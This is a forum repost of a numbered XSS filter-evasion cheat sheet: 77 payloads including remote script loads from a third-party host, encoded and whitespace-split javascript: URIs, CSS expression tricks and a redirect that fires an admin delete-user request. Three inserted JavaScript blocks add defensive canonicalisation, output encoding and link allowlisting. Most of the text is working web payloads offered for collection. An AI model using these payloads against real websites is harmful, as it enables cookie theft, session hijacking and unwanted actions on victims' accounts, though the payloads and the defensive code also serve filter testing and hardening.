It seems t00ls has relatively little material on XSS. I saw something good and copied it over; not sure whether any of you need to bookmark it.

(1) Basic XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect in China, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
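A defensive counterpart to items 3 to 15 and 17 to 19, added here as an example; it is not part of the original post or of the fuzzexp.org page it was copied from. Every one of those items beats a filter that looks at the raw attribute string, because the browser first decodes character references, drops NUL/tab/LF/CR and leading spaces, and ignores case. A URL-attribute check therefore has to canonicalise the value the same way before it compares the scheme against an allowlist. The function names, the allowlist and the sample values below are my own assumptions.

```javascript
// Added example (not from the original post): canonicalise a URL-valued
// attribute (href, src, background, ...) before deciding whether to emit it.

// Minimal HTML character-reference decoder. Browsers accept numeric
// references without the trailing semicolon, so this decoder does too.
const NAMED_REFS = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", tab: "\t", newline: "\n" };

function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const cp = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const name = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : match;
  });
}

// Strip what the browser ignores when it parses a URL: C0 control characters
// (NUL, tab, LF, CR, ...) anywhere, plus surrounding whitespace. This is a
// little stricter than the URL standard (which only removes tab/LF/CR in the
// middle and controls at the ends), which is the safe direction for a filter.
function canonicalizeUrlValue(value) {
  return decodeHtmlEntities(String(value))
    .replace(/[\u0000-\u001f\u007f]/g, "")
    .trim();
}

// Scheme per the URL grammar, lower-cased; null means a relative URL.
function urlScheme(canonical) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(canonical);
  return m ? m[1].toLowerCase() : null;
}

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);   // assumed policy

// True when the value can safely be written into a URL attribute. Relative
// URLs have no scheme and are accepted; any scheme must be on the allowlist,
// so javascript:, vbscript:, data: and unknown schemes are rejected.
function isSafeUrlAttribute(value) {
  const scheme = urlScheme(canonicalizeUrlValue(value));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed sample values modelled on the items above (not real captures).
const SAMPLE_VALUES = [
  "javascript:alert('XSS')",                     // item 3
  "JaVaScRiPt:alert('XSS')",                     // item 4
  "&#106;&#97;&#118;&#97;script:alert('XSS')",   // item 5: references with semicolons
  "&#106&#97&#118&#97script:alert('XSS')",       // item 9: no semicolons
  "&#x6A&#x61&#x76&#x61script:alert('XSS')",     // item 10: hex, no semicolons
  "jav\tascript:alert('XSS');",                  // item 11: raw tab
  "jav&#x09;ascript:alert('XSS');",              // item 12: encoded tab
  "jav\nascript:alert('XSS');",                  // item 13
  "jav\rascript:alert('XSS');",                  // item 14
  "java\u0000script:alert('XSS')",               // item 17: NUL
  " javascript:alert('XSS');",                   // item 19: leading space
  "vbscript:msgbox(\"XSS\")",                    // item 40
  "https://example.com/page",                    // allowed
  "/relative/path?x=1",                          // allowed, relative
  "mailto:someone@example.com",                  // allowed
];

function checkSamples() {
  return SAMPLE_VALUES.map((v) => ({ value: v, allowed: isSafeUrlAttribute(v) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const { value, allowed } of checkSamples()) {
    console.log(allowed ? "allow" : "block", JSON.stringify(value));
  }
}
```

Run it with node and the twelve obfuscated values print as "block" while the three plain ones print as "allow". The important design point is the order of operations: decode, strip, then match; a regex applied to the raw string sees "jav&#x09;ascript" and passes it, the browser sees "javascript:".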
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
</SCRIPT>
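Items 23, 29, 30 and 61 to 67 all work the same way: user data closes the element, attribute or string literal that the template opened, and whatever follows is parsed as new markup or code. The standard defence is output encoding chosen for the exact context the data lands in, and the following is an added example of that (my own code, not from this post or from the fuzzexp.org original; the helper names and sample inputs are assumptions).

```javascript
// Added example (not from the original post): context-specific output
// encoding, so that user data cannot close the surrounding element,
// attribute or string literal.

// HTML text and attribute context: every character that can end a tag or an
// attribute value, or start a new one, becomes a character reference.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;" };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// JavaScript string-literal context (an inline <script> that embeds user
// data). JSON.stringify escapes quotes and backslashes, which neutralises the
// \"; trick of item 29; "<" is then escaped so "</script>" cannot close the
// element, and U+2028/U+2029 so the literal cannot break the line.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Template helpers showing each encoder in its context.
function renderTitle(userTitle) {
  return `<title>${escapeHtml(userTitle)}</title>`;
}
function renderSearchBox(userQuery) {
  return `<input type="text" name="q" value="${escapeHtml(userQuery)}">`;
}
function renderInlineScript(userQuery) {
  return `<script>var lastQuery = ${jsStringLiteral(userQuery)};</script>`;
}

// Sanity check for a rendered fragment: the tag names present must be exactly
// the ones the template wrote. An encoded "<" never forms a tag.
function tagNames(html) {
  return Array.from(html.matchAll(/<\/?([a-z][a-z0-9]*)/gi), (m) => m[1].toLowerCase());
}

// Constructed inputs modelled on the items above.
const SAMPLES = {
  closeTitle: '</TITLE><SCRIPT>alert("XSS");</SCRIPT>',   // item 30
  breakAttr: '"><SCRIPT>alert("XSS")</SCRIPT>',            // items 61-66: close the attribute early
  doubleBracket: '<<SCRIPT>alert("XSS");//<</SCRIPT>',     // item 23
  escapeEscape: '\\";alert(\'XSS\');//',                   // item 29
  closeScript: '</script><script>alert("XSS")</script>',   // closing an inline script block
};

function demo() {
  return {
    title: renderTitle(SAMPLES.closeTitle),
    input: renderSearchBox(SAMPLES.breakAttr),
    script: renderInlineScript(SAMPLES.escapeEscape),
    titleTags: tagNames(renderTitle(SAMPLES.closeTitle)),
    inputTags: tagNames(renderSearchBox(SAMPLES.doubleBracket)),
    scriptTags: tagNames(renderInlineScript(SAMPLES.closeScript)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The two encoders are deliberately not interchangeable: escapeHtml applied inside a script string would leave the quote-and-backslash problem of item 29 untouched, and jsStringLiteral applied to an attribute would leave the quote that item 61 needs. Pick the encoder by where the template puts the data, not by what the data looks like.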
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
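Items 68 to 77 defeat a link filter that compares the raw href string with a hostname: the browser resolves "3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001" and the mixed form to a dotted-quad address, ignores a trailing dot, and fills in a missing scheme. The check below is an added example (my own code, not from this post or from the fuzzexp.org original) that canonicalises the host the way the URL standard's IPv4 parser does before comparing it with an allowlist; the function names, the allowlist contents and the sample hrefs are assumptions, and IPv6 literals and IDNs are out of scope.

```javascript
// Added example (not from the original post): canonicalise a link's host
// before comparing it with an allowlist.

// One dotted component, parsed as the URL standard does: a "0x" prefix is
// hex, a leading zero is octal, anything else is decimal. Returns null when
// the part is not a number at all (so "www" makes the host a domain name).
function parseIpv4Part(part) {
  let digits = part;
  let radix = 10;
  if (/^0x/i.test(digits)) {
    radix = 16;
    digits = digits.slice(2);
    if (digits === "") return 0;          // "0x" alone is zero
  } else if (digits.length > 1 && digits[0] === "0") {
    radix = 8;
    digits = digits.slice(1);
  }
  const valid = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Up to four parts; the last part may carry the remaining bytes, which is how
// a single decimal number (item 70) becomes a full address.
function parseIpv4(host) {
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop();   // "1.2.3.4."
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some((n) => n === null)) return null;
  const head = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  if (head.some((n) => n > 255)) return null;
  if (last >= 256 ** (5 - nums.length)) return null;
  let n = last;
  head.forEach((v, i) => { n += v * 256 ** (3 - i); });
  return [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join(".");
}

// Split an href into scheme and canonical host. Tab, LF and CR are removed
// first because browsers discard them anywhere in a URL (item 73).
function canonicalHost(href) {
  const cleaned = String(href).replace(/[\t\n\r]/g, "").trim();
  const m = /^(?:([a-z][a-z0-9+.\-]*):)?(?:\/\/([^/?#]*))?/i.exec(cleaned);
  const scheme = m[1] ? m[1].toLowerCase() : null;
  if (m[2] === undefined) return { scheme, host: null };   // relative URL, or a scheme without an authority
  let host = m[2].replace(/^[^@]*@/, "").replace(/:\d*$/, "").toLowerCase();   // drop userinfo and port
  if (host.endsWith(".")) host = host.slice(0, -1);        // absolute DNS name (item 76)
  const ip = parseIpv4(host);
  return { scheme, host: ip !== null ? ip : host };
}

// Assumed policy: http(s) links whose canonical host is allowlisted, plus
// relative links (which stay on this site). Anything with another scheme
// (javascript:, data:, vbscript:, ...) is refused outright.
function linkAllowed(href, allowedHosts) {
  const { scheme, host } = canonicalHost(href);
  if (scheme !== null && scheme !== "http" && scheme !== "https") return false;
  if (host === null) return true;
  return allowedHosts.has(host);
}

// Constructed sample hrefs following items 70-77; the allowlist is an assumption.
const ALLOWED_HOSTS = new Set(["www.google.com"]);
const SAMPLE_HREFS = [
  "http://3232235521/",                                     // item 70: decimal IP
  "http://0xc0.0xa8.0x00.0x01/",                            // item 71: hex IP
  "http://0300.0250.0000.0001/",                            // item 72: octal IP
  "h\ntt\tp://6\t6.000146.0x7.147/",                        // item 73: mixed, with raw tab/newline
  "//www.google.com/",                                      // item 74: scheme-relative
  "http://google.com/",                                     // item 75: a different host, not allowlisted
  "http://www.google.com./",                                // item 76: trailing dot
  "javascript:document.location='http://www.google.com/'",  // item 77
];

function checkLinks() {
  return SAMPLE_HREFS.map((h) => ({ href: h, host: canonicalHost(h).host, allowed: linkAllowed(h, ALLOWED_HOSTS) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const r of checkLinks()) console.log(r.allowed ? "allow" : "block", r.host, JSON.stringify(r.href));
}
```

Of the eight samples only the scheme-relative link and the trailing-dot link are allowed, because both canonicalise to the allowlisted name; the three numeric forms all canonicalise to 192.168.0.1 and the mixed form to 66.102.7.147, so a deny-list keyed on the same canonical host would catch them just as well.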
Original source: http://fuzzexp.org/u/0day/?p=14